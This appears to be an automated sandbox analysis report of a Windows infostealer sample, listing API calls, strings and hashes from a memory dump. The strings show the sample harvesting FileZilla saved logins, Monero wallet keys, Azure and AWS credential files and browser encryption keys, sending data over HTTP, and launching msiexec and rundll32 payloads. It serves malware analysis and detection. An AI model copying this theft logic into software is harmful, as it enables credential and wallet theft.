                        • Instruction Fuzzy Hash: F54158F3E082089BF3442D28EC493BAB696DB90310F1A463DDFC5D7781E93DA8054386
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 712ed1e87949afbdb7f862f50fe924a913c5ecbf53263423ff6617075b31a853
                        • Instruction ID: 68ec974b73a6e08368224459d9e3f3441044177b3ad1adbb0e62982fc0e1aa58
                        • Opcode Fuzzy Hash: 712ed1e87949afbdb7f862f50fe924a913c5ecbf53263423ff6617075b31a853
                        • Instruction Fuzzy Hash: 2E2191F3B086004BF348992ADD9577BB6C7DBD4315F2AC43DDB8587AC8DD7888064295
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009A8E0B
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 009999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009999EC
                          • Part of subcall function 009999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00999A11
                          • Part of subcall function 009999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00999A31
                          • Part of subcall function 009999C0: ReadFile.KERNEL32(000000FF,?,00000000,0099148F,00000000), ref: 00999A5A
                          • Part of subcall function 009999C0: LocalFree.KERNEL32(0099148F), ref: 00999A90
                          • Part of subcall function 009999C0: CloseHandle.KERNEL32(000000FF), ref: 00999A9A
                          • Part of subcall function 009A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009A8E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,009B0DBA,009B0DB7,009B0DB6,009B0DB3), ref: 009A0362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A0369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 009A0385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B0DB2), ref: 009A0393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 009A03CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B0DB2), ref: 009A03DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 009A0419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B0DB2), ref: 009A0427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 009A0463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B0DB2), ref: 009A0475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B0DB2), ref: 009A0502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B0DB2), ref: 009A051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B0DB2), ref: 009A0532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B0DB2), ref: 009A054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 009A0562
                        • lstrcat.KERNEL32(?,profile: null), ref: 009A0571
                        • lstrcat.KERNEL32(?,url: ), ref: 009A0580
                        • lstrcat.KERNEL32(?,00000000), ref: 009A0593
                        • lstrcat.KERNEL32(?,009B1678), ref: 009A05A2
                        • lstrcat.KERNEL32(?,00000000), ref: 009A05B5
                        • lstrcat.KERNEL32(?,009B167C), ref: 009A05C4
                        • lstrcat.KERNEL32(?,login: ), ref: 009A05D3
                        • lstrcat.KERNEL32(?,00000000), ref: 009A05E6
                        • lstrcat.KERNEL32(?,009B1688), ref: 009A05F5
                        • lstrcat.KERNEL32(?,password: ), ref: 009A0604
                        • lstrcat.KERNEL32(?,00000000), ref: 009A0617
                        • lstrcat.KERNEL32(?,009B1698), ref: 009A0626
                        • lstrcat.KERNEL32(?,009B169C), ref: 009A0635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B0DB2), ref: 009A068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: 15cfb5034cdf5968d72d0d89241a9b986b41ae8292efa92e58601c67fccc3fbe
                        • Instruction ID: 2f5c8104de95c8604e9725122e43c59d28f8f1c871ab87daafb6e162e0739f29
                        • Opcode Fuzzy Hash: 15cfb5034cdf5968d72d0d89241a9b986b41ae8292efa92e58601c67fccc3fbe
                        • Instruction Fuzzy Hash: DCD11E71D00208ABCB44EBF4DD96EEEB778EF99300F504519F502A7091EF75AA06DBA1
                        APIs
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 009947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00994839
                          • Part of subcall function 009947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00994849
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009959F8
                        • StrCmpCA.SHLWAPI(?,015BE270), ref: 00995A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00995B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,015BE220,00000000,?,015B9E58,00000000,?,009B1A1C), ref: 00995E71
                        • lstrlen.KERNEL32(00000000), ref: 00995E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00995E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00995E9A
                        • lstrlen.KERNEL32(00000000), ref: 00995EAF
                        • lstrlen.KERNEL32(00000000), ref: 00995ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00995EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 00995F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00995F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00995F4C
                        • InternetCloseHandle.WININET(00000000), ref: 00995FB0
                        • InternetCloseHandle.WININET(00000000), ref: 00995FBD
                        • HttpOpenRequestA.WININET(00000000,015BE3C0,?,015BDB00,00000000,00000000,00400100,00000000), ref: 00995BF8
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                        • InternetCloseHandle.WININET(00000000), ref: 00995FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 874700897-2180234286
                        • Opcode ID: 742ef70b91b240bbd7e091af4a62805a962c3a44cb513769a21dd189f5560eea
                        • Instruction ID: 4bbb6a3f7eb465447a8cbc622a76c278234574140649094e19fec25a144260b1
                        • Opcode Fuzzy Hash: 742ef70b91b240bbd7e091af4a62805a962c3a44cb513769a21dd189f5560eea
                        • Instruction Fuzzy Hash: 3B122D71820118ABCB55EBA4DCA6FEEB378BF95700F504199F10663091EF342E4ACFA5
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009A8B60: GetSystemTime.KERNEL32(009B0E1A,015B9A38,009B05AE,?,?,009913F9,?,0000001A,009B0E1A,00000000,?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009A8B86
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0099CF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0099D0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0099D0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 0099D208
                        • lstrcat.KERNEL32(?,009B1478), ref: 0099D217
                        • lstrcat.KERNEL32(?,00000000), ref: 0099D22A
                        • lstrcat.KERNEL32(?,009B147C), ref: 0099D239
                        • lstrcat.KERNEL32(?,00000000), ref: 0099D24C
                        • lstrcat.KERNEL32(?,009B1480), ref: 0099D25B
                        • lstrcat.KERNEL32(?,00000000), ref: 0099D26E
                        • lstrcat.KERNEL32(?,009B1484), ref: 0099D27D
                        • lstrcat.KERNEL32(?,00000000), ref: 0099D290
                        • lstrcat.KERNEL32(?,009B1488), ref: 0099D29F
                        • lstrcat.KERNEL32(?,00000000), ref: 0099D2B2
                        • lstrcat.KERNEL32(?,009B148C), ref: 0099D2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 0099D2D4
                        • lstrcat.KERNEL32(?,009B1490), ref: 0099D2E3
                          • Part of subcall function 009AA820: lstrlen.KERNEL32(00994F05,?,?,00994F05,009B0DDE), ref: 009AA82B
                          • Part of subcall function 009AA820: lstrcpy.KERNEL32(009B0DDE,00000000), ref: 009AA885
                        • lstrlen.KERNEL32(?), ref: 0099D32A
                        • lstrlen.KERNEL32(?), ref: 0099D339
                          • Part of subcall function 009AAA70: StrCmpCA.SHLWAPI(015B8AC0,0099A7A7,?,0099A7A7,015B8AC0), ref: 009AAA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 0099D3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: ba1eab4ff148ba1718e31cf767bc26c39243b052ba45ba388b007f3d018f5da3
                        • Instruction ID: f3dc827fea50818000c758d0dedd91b39356057f8c282d8d9609c510440c7a22
                        • Opcode Fuzzy Hash: ba1eab4ff148ba1718e31cf767bc26c39243b052ba45ba388b007f3d018f5da3
                        • Instruction Fuzzy Hash: C0E15171910108ABCB44EBA4DDA6FEEB379BF95300F104159F107A70A1EF35AE05CBA6
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,015BCF28,00000000,?,009B144C,00000000,?,?), ref: 0099CA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0099CA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0099CA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0099CAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0099CAD9
                        • StrStrA.SHLWAPI(?,015BCE80,009B0B52), ref: 0099CAF7
                        • StrStrA.SHLWAPI(00000000,015BCDF0), ref: 0099CB1E
                        • StrStrA.SHLWAPI(?,015BD338,00000000,?,009B1458,00000000,?,00000000,00000000,?,015B8B70,00000000,?,009B1454,00000000,?), ref: 0099CCA2
                        • StrStrA.SHLWAPI(00000000,015BD098), ref: 0099CCB9
                          • Part of subcall function 0099C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0099C871
                          • Part of subcall function 0099C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0099C87C
                        • StrStrA.SHLWAPI(?,015BD098,00000000,?,009B145C,00000000,?,00000000,015B8A60), ref: 0099CD5A
                        • StrStrA.SHLWAPI(00000000,015B88D0), ref: 0099CD71
                          • Part of subcall function 0099C820: lstrcat.KERNEL32(?,009B0B46), ref: 0099C943
                          • Part of subcall function 0099C820: lstrcat.KERNEL32(?,009B0B47), ref: 0099C957
                          • Part of subcall function 0099C820: lstrcat.KERNEL32(?,009B0B4E), ref: 0099C978
                        • lstrlen.KERNEL32(00000000), ref: 0099CE44
                        • CloseHandle.KERNEL32(00000000), ref: 0099CE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: b91760d569cd6cf2a514984333580488a3910222cb98926bfdbc3608b0311ac3
                        • Instruction ID: 684139d8e04e711b737d4aee8fd8cdac5df7cff456a8da2b12c815b3da28f69b
                        • Opcode Fuzzy Hash: b91760d569cd6cf2a514984333580488a3910222cb98926bfdbc3608b0311ac3
                        • Instruction Fuzzy Hash: B7E1FA71900108AFDB54EBA4DCA6FEEB778AF95300F404159F107A7191EF346A4ACBA6
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        • RegOpenKeyExA.ADVAPI32(00000000,015BAAC0,00000000,00020019,00000000,009B05B6), ref: 009A83A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 009A8426
                        • wsprintfA.USER32 ref: 009A8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 009A847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 009A848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 009A8499
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                        Strings
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 3246050789-3278919252
                        • Opcode ID: 1815a9eeaac0e71c5a72b702c50dc7760b66e624e09ec19241aeb264eb4f130e
                        • Instruction ID: c9f31ba68439daa025c35766cb4ef33895220ebaf27ca4b121ce95e9de4f2d99
                        • Opcode Fuzzy Hash: 1815a9eeaac0e71c5a72b702c50dc7760b66e624e09ec19241aeb264eb4f130e
                        • Instruction Fuzzy Hash: AA813B71911118ABEB68DB54CC95FEAB7B8BF48700F008299E10AA6180DF756B85CFD1
                        APIs
                          • Part of subcall function 009A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009A8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 009A4DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 009A4DCD
                          • Part of subcall function 009A4910: wsprintfA.USER32 ref: 009A492C
                          • Part of subcall function 009A4910: FindFirstFileA.KERNEL32(?,?), ref: 009A4943
                        • lstrcat.KERNEL32(?,00000000), ref: 009A4E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 009A4E59
                          • Part of subcall function 009A4910: StrCmpCA.SHLWAPI(?,009B0FDC), ref: 009A4971
                          • Part of subcall function 009A4910: StrCmpCA.SHLWAPI(?,009B0FE0), ref: 009A4987
                          • Part of subcall function 009A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 009A4B7D
                          • Part of subcall function 009A4910: FindClose.KERNEL32(000000FF), ref: 009A4B92
                        • lstrcat.KERNEL32(?,00000000), ref: 009A4EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 009A4EE5
                          • Part of subcall function 009A4910: wsprintfA.USER32 ref: 009A49B0
                          • Part of subcall function 009A4910: StrCmpCA.SHLWAPI(?,009B08D2), ref: 009A49C5
                          • Part of subcall function 009A4910: wsprintfA.USER32 ref: 009A49E2
                          • Part of subcall function 009A4910: PathMatchSpecA.SHLWAPI(?,?), ref: 009A4A1E
                          • Part of subcall function 009A4910: lstrcat.KERNEL32(?,015BE390), ref: 009A4A4A
                          • Part of subcall function 009A4910: lstrcat.KERNEL32(?,009B0FF8), ref: 009A4A5C
                          • Part of subcall function 009A4910: lstrcat.KERNEL32(?,?), ref: 009A4A70
                          • Part of subcall function 009A4910: lstrcat.KERNEL32(?,009B0FFC), ref: 009A4A82
                          • Part of subcall function 009A4910: lstrcat.KERNEL32(?,?), ref: 009A4A96
                          • Part of subcall function 009A4910: CopyFileA.KERNEL32(?,?,00000001), ref: 009A4AAC
                          • Part of subcall function 009A4910: DeleteFileA.KERNEL32(?), ref: 009A4B31
                        Strings
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 835874f04435ddcbdc031a1984402eba16e4efe71a6435c312159a6f1b421bd3
                        • Instruction ID: 6397b3f36ea4104683d5a1c41222c8531a7eb5edd20d48bbc094627edb9c2269
                        • Opcode Fuzzy Hash: 835874f04435ddcbdc031a1984402eba16e4efe71a6435c312159a6f1b421bd3
                        • Instruction Fuzzy Hash: 114181BA94020867CB50F770ED57FEE7338ABA5704F404494B689660C1FEB56BC9CB92
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 009A906C
                        Strings
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: 3ef6a4b666f9f6bd603090bde39a51d131875bbd04920ae52a38ec5ce2647195
                        • Instruction ID: 355323d915f12616b689a1d80357900074609042d3b6b449000e4d4f99604b03
                        • Opcode Fuzzy Hash: 3ef6a4b666f9f6bd603090bde39a51d131875bbd04920ae52a38ec5ce2647195
                        • Instruction Fuzzy Hash: 3971EC71A10208ABDB04DFE4DD99FEEB7B8BF88700F108509F515A7290EF35A905CB61
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 009A31C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 009A335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 009A34EA
                        Strings
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: 58af376534b148e090dc416a0766ecf740f563d9b290dd3a79de2a69e3342d9a
                        • Instruction ID: 562d8670e1211747bc6760f7753be7ca5e42c84e9847cfacfdc82c2012944200
                        • Opcode Fuzzy Hash: 58af376534b148e090dc416a0766ecf740f563d9b290dd3a79de2a69e3342d9a
                        • Instruction Fuzzy Hash: DC1219718001089BDB49EBA4DC92FEEB778AF95300F508169F50766091EF346B4ACFE6
                        APIs
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 00996280: InternetOpenA.WININET(009B0DFE,00000001,00000000,00000000,00000000), ref: 009962E1
                          • Part of subcall function 00996280: StrCmpCA.SHLWAPI(?,015BE270), ref: 00996303
                          • Part of subcall function 00996280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00996335
                          • Part of subcall function 00996280: HttpOpenRequestA.WININET(00000000,GET,?,015BDB00,00000000,00000000,00400100,00000000), ref: 00996385
                          • Part of subcall function 00996280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009963BF
                          • Part of subcall function 00996280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009963D1
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009A5318
                        • lstrlen.KERNEL32(00000000), ref: 009A532F
                          • Part of subcall function 009A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009A8E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 009A5364
                        • lstrlen.KERNEL32(00000000), ref: 009A5383
                        • lstrlen.KERNEL32(00000000), ref: 009A53AE
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: 1e769a1cfd90736ea31772a7dd817367f06a30a23491a531c6aa705152861456
                        • Instruction ID: 780edb71ac6f8e603609444cce363244e50e6569912e1f48c068006a06181cb3
                        • Opcode Fuzzy Hash: 1e769a1cfd90736ea31772a7dd817367f06a30a23491a531c6aa705152861456
                        • Instruction Fuzzy Hash: DC51FA309101489BCB58FF64CD96BEE7779AF92301F504018F8065B5A2EF386B46CBE2
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 7c659731375e75d0f841b2c699588ba648795eb806bd44de13149aa9e428fab6
                        • Instruction ID: 09262ba1d5d70a8e2b3be428e9b8ec339a2ce7c0007e57102b5fbd3daa9e499c
                        • Opcode Fuzzy Hash: 7c659731375e75d0f841b2c699588ba648795eb806bd44de13149aa9e428fab6
                        • Instruction Fuzzy Hash: 73C190B59012199BCB14EF60DC99FEE7378BBA4304F004599F50AA7281EF74AA85CFD1
                        APIs
                          • Part of subcall function 009A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009A8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 009A42EC
                        • lstrcat.KERNEL32(?,015BDBD8), ref: 009A430B
                        • lstrcat.KERNEL32(?,?), ref: 009A431F
                        • lstrcat.KERNEL32(?,015BCE98), ref: 009A4333
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009A8D90: GetFileAttributesA.KERNEL32(00000000,?,00991B54,?,?,009B564C,?,?,009B0E1F), ref: 009A8D9F
                          • Part of subcall function 00999CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00999D39
                          • Part of subcall function 009999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009999EC
                          • Part of subcall function 009999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00999A11
                          • Part of subcall function 009999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00999A31
                          • Part of subcall function 009999C0: ReadFile.KERNEL32(000000FF,?,00000000,0099148F,00000000), ref: 00999A5A
                          • Part of subcall function 009999C0: LocalFree.KERNEL32(0099148F), ref: 00999A90
                          • Part of subcall function 009999C0: CloseHandle.KERNEL32(000000FF), ref: 00999A9A
                          • Part of subcall function 009A93C0: GlobalAlloc.KERNEL32(00000000,009A43DD,009A43DD), ref: 009A93D3
                        • StrStrA.SHLWAPI(?,015BDB90), ref: 009A43F3
                        • GlobalFree.KERNEL32(?), ref: 009A4512
                          • Part of subcall function 00999AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00994EEE,00000000,00000000), ref: 00999AEF
                          • Part of subcall function 00999AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00994EEE,00000000,?), ref: 00999B01
                          • Part of subcall function 00999AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00994EEE,00000000,00000000), ref: 00999B2A
                          • Part of subcall function 00999AC0: LocalFree.KERNEL32(?,?,?,?,00994EEE,00000000,?), ref: 00999B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 009A44A3
                        • StrCmpCA.SHLWAPI(?,009B08D1), ref: 009A44C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009A44D2
                        • lstrcat.KERNEL32(00000000,?), ref: 009A44E5
                        • lstrcat.KERNEL32(00000000,009B0FB8), ref: 009A44F4
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
